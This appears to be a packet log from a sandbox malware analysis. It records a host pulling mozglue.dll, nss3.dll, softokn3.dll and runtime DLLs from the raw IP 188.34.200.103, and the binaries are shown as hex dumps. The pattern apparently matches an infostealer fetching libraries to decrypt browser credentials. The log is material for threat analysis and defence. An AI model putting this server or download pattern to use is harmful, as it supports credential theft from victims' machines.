Aug 24, 2021 08:46:58.027601957 CEST	14210	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Aug 24, 2021 08:46:58.027625084 CEST	14211	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Aug 24, 2021 08:46:58.027650118 CEST	14213	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Aug 24, 2021 08:46:58.027674913 CEST	14214	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Aug 24, 2021 08:46:58.027698040 CEST	14215	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Aug 24, 2021 08:46:58.027720928 CEST	14217	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Aug 24, 2021 08:46:58.048347950 CEST	14218	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Aug 24, 2021 08:46:58.460644960 CEST	14554	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:46:58.481333017 CEST	14556	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:58 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:46:58 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Aug 24, 2021 08:46:58.619436026 CEST	14699	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:46:58.645119905 CEST	14700	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:58 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:46:58 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Aug 24, 2021 08:46:59.160132885 CEST	15159	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:46:59.180846930 CEST	15160	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:46:59 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:46:59 GMT Cache-Control: max-age=86400 X-Cache-Status: HIT X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Aug 24, 2021 08:47:01.522785902 CEST	16469	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:47:01.543282032 CEST	16470	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:47:01 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Aug 24, 2021 08:47:01.724013090 CEST	16798	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:47:01.745397091 CEST	16799	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:47:01 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:47:01 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 